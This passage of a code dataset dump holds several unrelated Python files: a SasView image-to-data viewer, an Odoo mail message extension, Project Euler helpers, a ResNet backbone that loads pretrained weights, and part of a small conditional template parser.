a file dialog to allow the user to select a given file.\n Display the loaded data if available.\n \"\"\"\n def __init__(self, parent=None):\n \"\"\"\n Init\n \"\"\"\n self.parent = parent\n\n def load(self):\n \"\"\"\n load image files\n \"\"\"\n parent = self.parent\n if parent is None:\n location = os.getcwd()\n else:\n location = parent._default_save_location\n path_list = self.choose_data_file(location=location)\n if path_list is None:\n return\n if len(path_list) >= 0 and path_list[0] is not None:\n if parent is not None:\n parent._default_save_location = os.path.dirname(path_list[0])\n err_msg = ''\n for file_path in path_list:\n basename = os.path.basename(file_path)\n _, extension = os.path.splitext(basename)\n try:\n # Note that matplotlib only reads png natively.\n # Any other formats (tiff, jpeg, etc) are passed\n # to PIL which seems to have a problem in version\n # 1.1.7 that causes a close error which shows up in \n # the log file. This does not seem to have any adverse\n # effects. PDB --- September 17, 2017.\n img = mpimg.imread(file_path)\n is_png = extension.lower() == '.png'\n plot_frame = ImageFrame(parent, -1, basename, img)\n plot_frame.Show(False)\n ax = plot_frame.plotpanel\n if not is_png:\n ax.subplot.set_ylim(ax.subplot.get_ylim()[::-1])\n ax.subplot.set_xlabel('x [pixel]')\n ax.subplot.set_ylabel('y [pixel]')\n ax.figure.subplots_adjust(left=0.15, bottom=0.1,\n right=0.95, top=0.95)\n plot_frame.SetTitle('Picture -- %s --' % basename)\n plot_frame.Show(True)\n if parent is not None:\n parent.put_icon(plot_frame)\n except:\n err_msg += \"Failed to load '%s'.\\n\" % basename\n if err_msg:\n if parent is not None:\n wx.PostEvent(parent, StatusEvent(status=err_msg, info=\"error\"))\n else:\n print(err_msg)\n\n def choose_data_file(self, location=None):\n \"\"\"\n Open a file dialog to allow loading a file\n \"\"\"\n path = None\n if location is None:\n location = os.getcwd()\n wildcard=\"Images (*.bmp;*.gif;*jpeg,*jpg;*.png;*tif;*.tiff)|*bmp;\\\n *.gif; *.jpg; *.jpeg;*png;*.png;*.tif;*.tiff|\"\\\n \"Bitmap (*.bmp)|*.bmp|\"\\\n \"GIF (*.gif)|*.gif|\"\\\n \"JPEG (*.jpg;*.jpeg)|*.jpg;*.jpeg|\"\\\n \"PNG (*.png)|*.png|\"\\\n \"TIFF (*.tif;*.tiff)|*.tif;*tiff|\"\\\n \"All Files (*.*)|*.*|\"\n\n dlg = wx.FileDialog(self.parent, \"Image Viewer: Choose an image file\",\n location, \"\", wildcard, style=wx.FD_OPEN\n | wx.FD_MULTIPLE)\n if dlg.ShowModal() == wx.ID_OK:\n path = dlg.GetPaths()\n else:\n return None\n dlg.Destroy()\n return path\n\nclass ImageFrame(PlotFrame):\n \"\"\"\n Frame for simple plot\n \"\"\"\n def __init__(self, parent, id, title, image=None, scale='log_{10}',\n size=wx.Size(550, 470)):\n \"\"\"\n comment\n :Param data: image array got from imread() of matplotlib [narray]\n :param parent: parent panel/container\n \"\"\"\n # Initialize the Frame object\n PlotFrame.__init__(self, parent, id, title, scale, size,\n show_menu_icons=False)\n self.parent = parent\n self.data = image\n self.file_name = title\n\n menu = wx.Menu()\n id = wx.NewId()\n item = wx.MenuItem(menu, id, \"&Convert to Data\")\n menu.AppendItem(item)\n wx.EVT_MENU(self, id, self.on_set_data)\n self.menu_bar.Append(menu, \"&Image\")\n\n menu_help = wx.Menu()\n id = wx.NewId()\n item = wx.MenuItem(menu_help, id, \"&HowTo\")\n menu_help.AppendItem(item)\n wx.EVT_MENU(self, id, self.on_help)\n self.menu_bar.Append(menu_help, \"&Help\")\n\n self.SetMenuBar(self.menu_bar)\n self.im_show(image)\n\n def on_set_data(self, event):\n \"\"\"\n Rescale the x y range, make 2D data and send it to data explore\n \"\"\"\n title = self.file_name\n self.panel = SetDialog(parent=self, title=title, image=self.data)\n self.panel.ShowModal()\n\n def on_help(self, event):\n \"\"\"\n Bring up Image Viewer Documentation from the image viewer window\n whenever the help menu item \"how to\" is clicked. Calls\n DocumentationWindow with the path of the location within the\n documentation tree (after /doc/ ....\".\n\n :param evt: Triggers on clicking \"how to\" in help menu\n \"\"\"\n\n _TreeLocation = \"user/sasgui/perspectives/calculator/\"\n _TreeLocation += \"image_viewer_help.html\"\n _doc_viewer = DocumentationWindow(self, -1, _TreeLocation, \"\",\n \"Image Viewer Help\")\n\n\nclass SetDialog(wx.Dialog):\n \"\"\"\n Dialog for Data Set\n \"\"\"\n def __init__(self, parent, id= -1, title=\"Convert to Data\", image=None,\n size=(_DIALOG_WIDTH, 270)):\n wx.Dialog.__init__(self, parent, id, title, size)\n # parent\n self.parent = parent\n self.base = parent.parent\n self.title = title\n self.image = np.array(image)\n self.z_ctrl = None\n self.xy_ctrls = []\n self.is_png = self._get_is_png()\n self._build_layout()\n my_title = \"Convert Image to Data - %s -\" % self.title\n self.SetTitle(my_title)\n self.SetSize(size)\n\n def _get_is_png(self):\n \"\"\"\n Get if the image file is png\n \"\"\"\n _, extension = os.path.splitext(self.title)\n return extension.lower() == '.png'\n\n def _build_layout(self):\n \"\"\"\n Layout\n \"\"\"\n vbox = wx.BoxSizer(wx.VERTICAL)\n zbox = wx.BoxSizer(wx.HORIZONTAL)\n xbox = wx.BoxSizer(wx.HORIZONTAL)\n ybox = wx.BoxSizer(wx.HORIZONTAL)\n btnbox = wx.BoxSizer(wx.VERTICAL)\n\n sb_title = wx.StaticBox(self, -1, 'Transform Axes')\n boxsizer = wx.StaticBoxSizer(sb_title, wx.VERTICAL)\n z_title = wx.StaticText(self, -1, 'z values (range: 0 - 255) to:')\n ztime_title = wx.StaticText(self, -1, 'z *')\n x_title = wx.StaticText(self, -1, 'x values from pixel # to:')\n xmin_title = wx.StaticText(self, -1, 'xmin:')\n xmax_title = wx.StaticText(self, -1, 'xmax:')\n y_title = wx.StaticText(self, -1, 'y values from pixel # to:')\n ymin_title = wx.StaticText(self, -1, 'ymin: ')\n ymax_title = wx.StaticText(self, -1, 'ymax:')\n z_ctl = InputTextCtrl(self, -1, size=(_BOX_WIDTH , 20),\n style=wx.TE_PROCESS_ENTER)\n\n xmin_ctl = InputTextCtrl(self, -1, size=(_BOX_WIDTH, 20),\n style=wx.TE_PROCESS_ENTER)\n xmax_ctl = InputTextCtrl(self, -1, size=(_BOX_WIDTH, 20),\n style=wx.TE_PROCESS_ENTER)\n ymin_ctl = InputTextCtrl(self, -1, size=(_BOX_WIDTH, 20),\n style=wx.TE_PROCESS_ENTER)\n ymax_ctl = InputTextCtrl(self, -1, size=(_BOX_WIDTH, 20),\n style=wx.TE_PROCESS_ENTER)\n z_ctl.SetValue('1.0')\n xmin_ctl.SetValue('-0.3')\n xmax_ctl.SetValue('0.3')\n ymin_ctl.SetValue('-0.3')\n ymax_ctl.SetValue('0.3')\n z_ctl.Bind(wx.EVT_TEXT, self._on_z_enter)\n xmin_ctl.Bind(wx.EVT_TEXT, self._onparam)\n xmax_ctl.Bind(wx.EVT_TEXT, self._onparam)\n ymin_ctl.Bind(wx.EVT_TEXT, self._onparam)\n ymax_ctl.Bind(wx.EVT_TEXT, self._onparam)\n xbox.AddMany([(x_title , 0, wx.LEFT, 0),\n (xmin_title , 0, wx.LEFT, 10),\n (xmin_ctl , 0, wx.LEFT, 10),\n (xmax_title , 0, wx.LEFT, 10),\n (xmax_ctl , 0, wx.LEFT, 10)])\n ybox.AddMany([(y_title , 0, wx.LEFT, 0),\n (ymin_title , 0, wx.LEFT, 10),\n (ymin_ctl , 0, wx.LEFT, 10),\n (ymax_title , 0, wx.LEFT, 10),\n (ymax_ctl , 0, wx.LEFT, 10)])\n zbox.AddMany([(z_title , 0, wx.LEFT, 0),\n (ztime_title, 0, wx.LEFT, 10),\n (z_ctl , 0, wx.LEFT, 7),\n ])\n msg = \"The data rescaled will show up in the Data Explorer. \\n\"\n msg += \"*Note: Recommend to use an image with 8 bit Grey \\n\"\n msg += \" scale (and with No. of pixels < 300 x 300).\\n\"\n msg += \" Otherwise, z = 0.299R + 0.587G + 0.114B.\"\n note_txt = wx.StaticText(self, -1, msg)\n note_txt.SetForegroundColour(\"black\")\n hbox = wx.BoxSizer(wx.HORIZONTAL)\n okButton = wx.Button(self, -1, 'OK')\n okButton.Bind(wx.EVT_BUTTON, self.on_set)\n cancelButton = wx.Button(self, -1, 'Cancel')\n cancelButton.Bind(wx.EVT_BUTTON, self.OnClose)\n btnbox.Add(okButton, 0, wx.LEFT | wx.BOTTOM, 5)\n btnbox.Add(cancelButton, 0, wx.LEFT | wx.TOP, 5)\n hbox.Add(note_txt, 0, wx.LEFT, 5)\n hbox.Add(btnbox, 0, wx.LEFT, 15)\n vbox.Add((10, 15))\n boxsizer.Add(xbox, 1, wx.LEFT | wx.BOTTOM, 5)\n boxsizer.Add(ybox, 1, wx.LEFT | wx.BOTTOM, 5)\n boxsizer.Add(zbox, 1, wx.LEFT | wx.BOTTOM, 5)\n vbox.Add(boxsizer, 0, wx.LEFT, 20)\n vbox.Add(hbox, 0, wx.LEFT | wx.TOP, 15)\n okButton.SetFocus()\n # set sizer\n self.SetSizer(vbox)\n #pos = self.parent.GetPosition()\n #self.SetPosition(pos)\n self.z_ctrl = z_ctl\n self.xy_ctrls = [[xmin_ctl, xmax_ctl], [ymin_ctl, ymax_ctl]]\n\n def _onparamEnter(self, event=None):\n \"\"\"\n By pass original txtcrl binding\n \"\"\"\n pass\n\n def _onparam(self, event=None):\n \"\"\"\n Set to default\n \"\"\"\n item = event.GetEventObject()\n self._check_ctrls(item)\n\n def _check_ctrls(self, item, is_button=False):\n \"\"\"\n \"\"\"\n flag = True\n item.SetBackgroundColour(\"white\")\n try:\n val = float(item.GetValue())\n if val < -10.0 or val > 10.0:\n item.SetBackgroundColour(\"pink\")\n item.Refresh()\n flag = False\n except:\n item.SetBackgroundColour(\"pink\")\n item.Refresh()\n flag = False\n if not flag and is_button:\n err_msg = \"The allowed range of the min and max values are \\n\"\n err_msg += \"between -10 and 10.\"\n if self.base is not None:\n wx.PostEvent(self.base, StatusEvent(status=err_msg,\n info=\"error\"))\n else:\n print(err_msg)\n return flag\n\n def _on_z_enter(self, event=None):\n \"\"\"\n On z factor enter\n \"\"\"\n item = event.GetEventObject()\n self._check_z_ctrl(item)\n\n def _check_z_ctrl(self, item, is_button=False):\n \"\"\"\n \"\"\"\n flag = True\n item.SetBackgroundColour(\"white\")\n try:\n val = float(item.GetValue())\n if val <= 0:\n item.SetBackgroundColour(\"pink\")\n item.Refresh()\n flag = False\n except:\n item.SetBackgroundColour(\"pink\")\n item.Refresh()\n flag = False\n if not flag and is_button:\n err_msg = \"The z scale value should be larger than 0.\"\n if self.base is not None:\n wx.PostEvent(self.base, StatusEvent(status=err_msg,\n info=\"error\"))\n else:\n print(err_msg)\n return flag\n\n def on_set(self, event):\n \"\"\"\n Set image as data\n \"\"\"\n event.Skip()\n # Check the textctrl values\n for item_list in self.xy_ctrls:\n for item in item_list:\n if not self._check_ctrls(item, True):\n return\n if not self._check_z_ctrl(self.z_ctrl, True):\n return\n try:\n image = self.image\n xmin = float(self.xy_ctrls[0][0].GetValue())\n xmax = float(self.xy_ctrls[0][1].GetValue())\n ymin = float(self.xy_ctrls[1][0].GetValue())\n ymax = float(self.xy_ctrls[1][1].GetValue())\n zscale = float(self.z_ctrl.GetValue())\n self.convert_image(image, xmin, xmax, ymin, ymax, zscale)\n except:\n err_msg = \"Error occurred while converting Image to Data.\"\n if self.base is not None:\n wx.PostEvent(self.base, StatusEvent(status=err_msg,\n info=\"error\"))\n else:\n print(err_msg)\n\n self.OnClose(event)\n\n def convert_image(self, rgb, xmin, xmax, ymin, ymax, zscale):\n \"\"\"\n Convert image to data2D\n \"\"\"\n x_len = len(rgb[0])\n y_len = len(rgb)\n x_vals = np.linspace(xmin, xmax, num=x_len)\n y_vals = np.linspace(ymin, ymax, num=y_len)\n # Instantiate data object\n output = Data2D()\n output.filename = os.path.basename(self.title)\n output.id = output.filename\n detector = Detector()\n detector.pixel_size.x = None\n detector.pixel_size.y = None\n # Store the sample to detector distance\n detector.distance = None\n output.detector.append(detector)\n # Initiazed the output data object\n output.data = zscale * self.rgb2gray(rgb)\n output.err_data = np.zeros([x_len, y_len])\n output.mask = np.ones([x_len, y_len], dtype=bool)\n output.xbins = x_len\n output.ybins = y_len\n output.x_bins = x_vals\n output.y_bins = y_vals\n output.qx_data = np.array(x_vals)\n output.qy_data = np.array(y_vals)\n output.xmin = xmin\n output.xmax = xmax\n output.ymin = ymin\n output.ymax = ymax\n output.xaxis('\\\\rm{Q_{x}}', '\\AA^{-1}')\n output.yaxis('\\\\rm{Q_{y}}', '\\AA^{-1}')\n # Store loading process information\n output.meta_data['loader'] = self.title.split('.')[-1] + \"Reader\"\n output.is_data = True\n output = reader2D_converter(output)\n if self.base is not None:\n data = self.base.create_gui_data(output, self.title)\n self.base.add_data({data.id:data})\n\n def rgb2gray(self, rgb):\n \"\"\"\n RGB to Grey\n \"\"\"\n if self.is_png:\n # png image limits: 0 to 1, others 0 to 255\n #factor = 255.0\n rgb = rgb[::-1]\n if rgb.ndim == 2:\n grey = np.rollaxis(rgb, axis=0)\n else:\n red, green, blue = np.rollaxis(rgb[..., :3], axis= -1)\n grey = 0.299 * red + 0.587 * green + 0.114 * blue\n max_i = rgb.max()\n factor = 255.0 / max_i\n grey *= factor\n return np.array(grey)\n\n def OnClose(self, event):\n \"\"\"\n Close event\n \"\"\"\n # clear event\n event.Skip()\n self.Destroy()\n\nif __name__ == \"__main__\":\n app = wx.App()\n ImageView(None).load()\n app.MainLoop()\n","sub_path":"jhub37_mantid_baseline/sasview-5.0.3/src/sas/sasgui/perspectives/calculator/image_viewer.py","file_name":"image_viewer.py","file_ext":"py","file_size_in_byte":16472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"472524349","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields, api\nfrom bs4 import BeautifulSoup\n# class jj_mail(models.Model):\n# _name = 'jj_mail.jj_mail'\n\n# name = fields.Char()\n# value = fields.Integer()\n# value2 = fields.Float(compute=\"_value_pc\", store=True)\n# description = fields.Text()\n#\n# @api.depends('value')\n# def _value_pc(self):\n# self.value2 = float(self.value) / 100\n\n\nclass MailMessageExtend(models.Model):\n\n _inherit = 'mail.message'\n\n @api.depends('is_show')\n @api.model\n def get_is_show(self):\n\n\n pid = self.author_id.id\n pids = [p.id for p in self.partner_ids]\n if pid == self.env.user.partner_id.id or pid in pids:\n self.is_show = True\n else:\n self.is_show = False\n\n\n\n is_show = fields.Boolean(compute=get_is_show)\n\n @api.depends('body_plain_slug', 'body')\n @api.model\n def compute_body_plain(self):\n body = self.body\n soup = BeautifulSoup(body, 'html.parser')\n plain = soup.get_text()\n if soup and plain:\n if len(plain) > 20:\n self.body_plain_slug = plain[0:20]\n else:\n self.body_plain_slug = plain\n else:\n self.body_plain_slug = ''\n\n body_plain_slug = fields.Char(string='消息', compute=compute_body_plain)\n\n @api.multi\n def read(self, fields=None, load='_classic_read'):\n \"\"\"\n 获取审阅状态,并更新\n :param fields:\n :param load:\n :return:\n \"\"\"\n # 获取师徒读取的值\n k = 'is_show'\n\n f = super(MailMessageExtend, self).read(fields=fields, load=load)\n index = 0\n datas = []\n\n for v in f:\n\n if k in v.keys() and not v[k]:\n datas.append(v)\n for d in datas:\n f.remove(d)\n\n return f\n\n @api.model\n def get_messages(self, domain, limit=20):\n fields = [\n 'id', 'body', 'date', 'author_id', 'email_from', # base message fields\n 'message_type', 'subtype_id', 'subject', # message specific\n 'model', 'res_id', 'record_name', # document related\n 'channel_ids', 'partner_ids', # recipients\n 'needaction_partner_ids', # list of partner ids for whom the message is a needaction\n 'starred_partner_ids', # list of partner ids for whom the message is starred\n ]\n\n p = self.env.cr.execute('SELECT * FROM mail_message')\n\n\n f = self.sudo().search(domain, limit=limit).message_format()\n\n k = 'is_show'\n datas = []\n\n\n return f\n\n @api.model\n def message_fetch(self, domain, limit=20):\n\n\n s = super(MailMessageExtend, self).search(domain, limit=limit).message_format()\n\n return s","sub_path":"jj_mail/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"44160335","text":"###################################\n#\n# Problem 20 Project Euler\n#\n###################################\n\ndef sumDigits(num,power = 1):\n\tnumStr = str(num**power)\n\tsumDigits = 0\n\tfor a in range(len(numStr)):\n\t\tsumDigits += int(numStr[a])\n\treturn sumDigits\n\ndef factorial(num):\n\tproduct = 1\n\twhile num >1:\n\t\tproduct *= num\n\t\tnum += -1\n\treturn product\n","sub_path":"Problem020.py","file_name":"Problem020.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"16758604","text":"# !/usr/bin/env python\r\n# -- coding: utf-8 --\r\n# @Time : 2020/11/3 9:02\r\n# @Author : liumin\r\n# @File : resnet.py\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torch.utils import model_zoo\r\nfrom torchvision.models.resnet import resnet18, resnet34, resnet50, resnet101, resnet152\r\n\r\n\"\"\"\r\n Deep Residual Learning for Image Recognition\r\n https://arxiv.org/pdf/1512.03385.pdf\r\n\"\"\"\r\n\r\nmodel_urls = {\r\n 'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',\r\n 'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',\r\n 'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',\r\n 'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',\r\n 'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',\r\n}\r\n\r\n\r\nclass ResNet(nn.Module):\r\n\r\n def __init__(self, subtype='resnet50', out_stages=[2, 3, 4], output_stride = 32, backbone_path=None, pretrained = False):\r\n super(ResNet, self).__init__()\r\n self.subtype = subtype\r\n self.out_stages = out_stages\r\n self.output_stride = output_stride # 8, 16, 32\r\n self.backbone_path = backbone_path\r\n self.pretrained = pretrained\r\n\r\n if self.subtype == 'resnet18':\r\n backbone = resnet18(self.pretrained)\r\n self.out_channels = [64, 64, 128, 256, 512]\r\n elif self.subtype == 'resnet34':\r\n backbone = resnet34(self.pretrained)\r\n self.out_channels = [64, 64, 128, 256, 512]\r\n elif self.subtype == 'resnet50':\r\n backbone = resnet50(self.pretrained)\r\n self.out_channels = [64, 256, 512, 1024, 2048]\r\n elif self.subtype == 'resnet101':\r\n backbone = resnet101(self.pretrained)\r\n self.out_channels = [64, 256, 512, 1024, 2048]\r\n elif self.subtype == 'resnet152':\r\n backbone = resnet152(self.pretrained)\r\n self.out_channels = [64, 256, 512, 1024, 2048]\r\n else:\r\n raise NotImplementedError\r\n\r\n self.out_channels = [self.out_channels[ost] for ost in self.out_stages]\r\n\r\n self.conv1 = backbone.conv1\r\n self.bn1 = backbone.bn1\r\n self.relu = backbone.relu\r\n self.maxpool = backbone.maxpool\r\n self.layer1 = backbone.layer1\r\n self.layer2 = backbone.layer2\r\n self.layer3 = backbone.layer3\r\n self.layer4 = backbone.layer4\r\n\r\n if self.output_stride == 16:\r\n s3, s4, d3, d4 = (2, 1, 1, 2)\r\n elif self.output_stride == 8:\r\n s3, s4, d3, d4 = (1, 1, 2, 4)\r\n\r\n for n, m in self.layer3.named_modules():\r\n if 'conv1' in n and (subtype == 'resnet34' or subtype == 'resnet18'):\r\n m.dilation, m.padding, m.stride = (d3, d3), (d3, d3), (s3, s3)\r\n elif 'conv2' in n:\r\n m.dilation, m.padding, m.stride = (d3, d3), (d3, d3), (s3, s3)\r\n elif 'downsample.0' in n:\r\n m.stride = (s3, s3)\r\n\r\n if self.output_stride == 8 or self.output_stride == 16:\r\n for n, m in self.layer4.named_modules():\r\n if 'conv1' in n and (subtype == 'resnet34' or subtype == 'resnet18'):\r\n m.dilation, m.padding, m.stride = (d4, d4), (d4, d4), (s4, s4)\r\n elif 'conv2' in n:\r\n m.dilation, m.padding, m.stride = (d4, d4), (d4, d4), (s4, s4)\r\n elif 'downsample.0' in n:\r\n m.stride = (s4, s4)\r\n\r\n if self.pretrained:\r\n self.load_pretrained_weights()\r\n else:\r\n self.init_weights()\r\n\r\n\r\n def forward(self, x):\r\n x = self.maxpool(self.relu(self.bn1(self.conv1(x))))\r\n output = []\r\n for i in range(1, 5):\r\n res_layer = getattr(self, 'layer{}'.format(i))\r\n x = res_layer(x)\r\n if i in self.out_stages:\r\n output.append(x)\r\n\r\n return output if len(self.out_stages) > 1 else output[0]\r\n\r\n def freeze_bn(self):\r\n for layer in self.modules():\r\n if isinstance(layer, nn.BatchNorm2d):\r\n layer.eval()\r\n\r\n def freeze_stages(self, stage):\r\n if stage >= 0:\r\n self.bn1.eval()\r\n for m in [self.conv1, self.bn1]:\r\n for param in m.parameters():\r\n param.requires_grad = False\r\n for i in range(1, stage + 1):\r\n layer = getattr(self, 'layer{}'.format(i))\r\n layer.eval()\r\n for param in layer.parameters():\r\n param.requires_grad = False\r\n\r\n def init_weights(self):\r\n for m in self.modules():\r\n if isinstance(m, nn.Conv2d):\r\n nn.init.normal_(m.weight, std=0.001)\r\n if m.bias is not None:\r\n nn.init.constant_(m.bias, 0)\r\n elif isinstance(m, nn.BatchNorm2d):\r\n nn.init.constant_(m.weight, 1)\r\n nn.init.constant_(m.bias, 0.0001)\r\n\r\n def load_pretrained_weights(self):\r\n url = model_urls[self.subtype]\r\n if url is not None:\r\n pretrained_state_dict = model_zoo.load_url(url)\r\n print('=> loading pretrained model {}'.format(url))\r\n self.load_state_dict(pretrained_state_dict, strict=False)\r\n elif self.backbone_path is not None:\r\n print('=> loading pretrained model {}'.format(self.backbone_path))\r\n self.load_state_dict(torch.load(self.backbone_path))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n model = ResNet('resnet50')\r\n print(model)\r\n\r\n input = torch.randn(1, 3, 224, 224)\r\n out = model(input)\r\n for o in out:\r\n print(o.shape)","sub_path":"src/models/backbones/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":5674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"524674548","text":"import string\r\n\r\nID_FIRST = frozenset(\"\".join((string.ascii_letters, \"_\")))\r\nID_REST = frozenset(\"\".join((string.ascii_letters, string.digits, \"_\")))\r\nKEYWORDS = frozenset((\"if\", \"not\"))\r\n(TKN_NAME, TKN_NUMBER, TKN_STRING, TKN_RELOP) = range(4)\r\n\r\nclass ConditionalTemplate (object):\r\n def __init__(self, pattern):\r\n self.vars = set()\r\n self.look = None\r\n self.pattern = pattern\r\n self.backouts = []\r\n self.pos = None\r\n self.len = len(self.pattern)\r\n self.last_match = None\r\n self._Next()\r\n self.template = self._Compile()\r\n self.vars = frozenset(self.vars)\r\n del self.look\r\n del self.pattern\r\n del self.backouts\r\n del self.pos\r\n del self.len\r\n del self.last_match\r\n \r\n def _Next(self):\r\n if self.pos is None:\r\n self.pos = 0\r\n elif self.pos < self.len:\r\n self.pos += 1\r\n if self.pos < self.len:\r\n self.look = self.pattern[self.pos]\r\n else:\r\n self.look = None\r\n \r\n def _SavePos(self):\r\n self.backouts.append(self.pos)\r\n \r\n def _RestorePos(self):\r\n self.pos = self.backouts.pop()\r\n if self.pos < self.len:\r\n self.look = self.pattern[self.pos]\r\n else:\r\n self.look = None\r\n \r\n def _KeepPos(self):\r\n self.backouts.pop()\r\n \r\n def _Match(self, token):\r\n if isinstance(token, basestring):\r\n self._SavePos()\r\n for i in xrange(len(token)):\r\n if self.look != token[i]:\r\n self._RestorePos()\r\n return False\r\n self._Next()\r\n self.last_match = token\r\n self._KeepPos()\r\n return True\r\n else:\r\n value = None\r\n if token == TKN_NAME:\r\n value = self._GetName()\r\n elif token == TKN_NUMBER:\r\n value = self._GetNumber()\r\n elif token == TKN_STRING:\r\n value = self._GetString()\r\n elif token == TKN_RELOP:\r\n value = self._GetRelationalOperator()\r\n if value is not None:\r\n self.last_match = value\r\n return value is not None\r\n \r\n def _Compile(self, nested=False):\r\n if nested:\r\n self._SavePos()\r\n if not self._Match(\"{\"):\r\n self._RestorePos()\r\n return None\r\n template = []\r\n templateString = []\r\n while self.look is not None:\r\n if self._Match(\"$$\"):\r\n templateString.append(\"$\")\r\n elif self._Match(\"${{\"):\r\n templateString.append(\"{{\")\r\n elif self._Match(\"$}}\"):\r\n templateString.append(\"}}\")\r\n elif self._Match(\"{\"):\r\n templateString.append(\"{{\")\r\n elif self._Match(\"}\"):\r\n if nested:\r\n break\r\n else:\r\n templateString.append(\"}}\")\r\n else:\r\n node = self._GetNode()\r\n if node is None:\r\n node = self.look\r\n self._Next()\r\n if isinstance(node, basestring):\r\n templateString.append(node)\r\n else:\r\n if len(templateString) > 0:\r\n template.append(u\"\".join(templateString))\r\n templateString = []\r\n template.append(node)\r\n if nested:\r\n if self.last_match == \"}\":\r\n self._KeepPos()\r\n else:\r\n self._RestorePos()\r\n return None\r\n if len(templateString) > 0:\r\n template.append(u\"\".join(templateString))\r\n return tuple(template)\r\n \r\n def _GetNode(self):\r\n self._SavePos()\r\n if not self._Match(\"$\"):\r\n self._RestorePos()\r\n return None\r\n elif self._Match(\"{\"):\r\n if not self._Match(TKN_NAME):\r\n self._RestorePos()\r\n return None\r\n name = self.last_match\r\n if not self._Match(\"}\"):\r\n self._RestorePos()\r\n return None\r\n elif self._Match(TKN_NAME):\r\n name = self.last_match\r\n else:\r\n self._RestorePos()\r\n return None\r\n if name in KEYWORDS and name != \"if\":\r\n self._RestorePos()\r\n return None\r\n if name != \"if\":\r\n self._KeepPos()\r\n self.vars.add(name)\r\n return u\"\".join((\"{\", name, \"}\"))\r\n condition = u\"\"\r\n conditional_vars = set()\r\n TrueTemplate = None\r\n FalseTemplate = None\r\n if not self._Match(\"(\"):\r\n self._RestorePos()\r\n return None\r\n self._SkipSpace()\r\n if self._Match(\"not \"):\r\n self._SkipSpace()\r\n if not self._Match(TKN_NAME):\r\n self._RestorePos()\r\n return None\r\n name = self.last_match\r\n condition += \"not \"\r\n elif self._Match(TKN_NAME):\r\n name = self.last_match\r\n else:\r\n self._RestorePos()\r\n return None\r\n if name in KEYWORDS:\r\n self._RestorePos()\r\n return None\r\n condition += name\r\n conditional_vars.add(name)\r\n self._SkipSpace()\r\n if self._Match(TKN_RELOP):\r\n condition += self.last_match\r\n self._SkipSpace()\r\n if self._Match(TKN_NAME) and self.last_match not in KEYWORDS:\r\n name = self.last_match\r\n conditional_vars.add(name)\r\n condition += name\r\n elif self._Match(TKN_STRING) or self._Match(TKN_NUMBER):\r\n condition += self.last_match\r\n else:\r\n self._RestorePos()\r\n return None\r\n if not self._Match(\")\"):\r\n self._RestorePos()\r\n return None\r\n TrueTemplate = self._Compile(nested=True)\r\n if TrueTemplate is not None:\r\n self._KeepPos()\r\n FalseTemplate = self._Compile(nested=True)\r\n else:\r\n self._RestorePos()\r\n return None\r\n for conditional_var in conditional_vars:\r\n self.vars.add(conditional_var)\r\n if FalseTemplate is None:\r\n return (condition, TrueTemplate, ())\r\n else:\r\n return (condition, TrueTemplate, FalseTemplate)\r\n \r\n def _GetRelationalOperator(self):\r\n if self._Match(\"<>\"):\r\n return \"!=\"\r\n for op in (\"<=\", \"<\", \">=\", \">\", \"==\", \"!=\"):\r\n if self._Match(op):\r\n return op\r\n return None\r\n \r\n def _GetString(self):\r\n self._SavePos()\r\n if not self._Match('\"'):\r\n self._RestorePos()\r\n return None\r\n parsedString = ['u\"']\r\n while self.look is not None:\r\n if self._Match(\"\\\\\"):\r\n parsedString.append(r\"\\\\\")\r\n elif self._Match('\"\"'):\r\n parsedString.append(r'\\\"')\r\n elif self._Match('\"'):\r\n parsedString.append('\"')\r\n self._KeepPos()\r\n return u\"\".join(parsedString)\r\n else:\r\n parsedString.append(self.look)\r\n self._Next()\r\n self._RestorePos()\r\n return None\r\n \r\n def _GetNumber(self):\r\n self._SavePos()\r\n parsedNumber = []\r\n if self._Match(\"-\"):\r\n parsedNumber.append(\"-\")\r\n elif self._Match(\"+\"):\r\n pass\r\n if self.look not in string.digits:\r\n self._RestorePos()\r\n return None\r\n if self._Match('0'):\r\n while self._Match('0'):\r\n pass\r\n if self.look not in string.digits:\r\n parsedNumber.append('0')\r\n while self.look in string.digits:\r\n parsedNumber.append(self.look)\r\n self._Next()\r\n self._KeepPos()\r\n self._SavePos()\r\n if self._Match(\".\"):\r\n if self.look not in string.digits:\r\n self._RestorePos()\r\n return u\"\".join(parsedNumber)\r\n parsedNumber.append(\".\")\r\n while self.look in string.digits:\r\n parsedNumber.append(self.look)\r\n self._Next()\r\n self._KeepPos()\r\n return u\"\".join(parsedNumber)\r\n \r\n def _GetName(self):\r\n self._SavePos()\r\n if self.look not in ID_FIRST:\r\n self._RestorePos()\r\n return None\r\n name = [self.look]\r\n self._Next()\r\n while self.look in ID_REST:\r\n name.append(self.look)\r\n self._Next()\r\n self._KeepPos()\r\n return u\"\".join(name)\r\n \r\n def _SkipSpace(self):\r\n if self._Match(\" \"):\r\n while self.look == \" \":\r\n self._Next()\r\n return True\r\n else:\r\n return False\r\n \r\n def Substitute(self, mapping, sub_template=None):\r\n data = None\r\n if sub_template is None:\r\n sub_template = self.template\r\n data = {}\r\n for var in self.vars:\r\n if var in mapping:\r\n data[var] = mapping[var]\r\n elif var == \"nl\":\r\n data['nl'] = u\"\\r\\n\"\r\n else:\r\n data[var] = u\"\"\r\n else:\r\n data = mapping\r\n strings = []\r\n for i in sub_template:\r\n if isinstance(i, basestring):\r\n strings.append(i.format(**data))\r\n elif eval(i[0], data):\r\n strings.append(self.Substitute(data, i[1]))\r\n else:\r\n strings.append(self.Substitute(data, i[2]))\r\n return 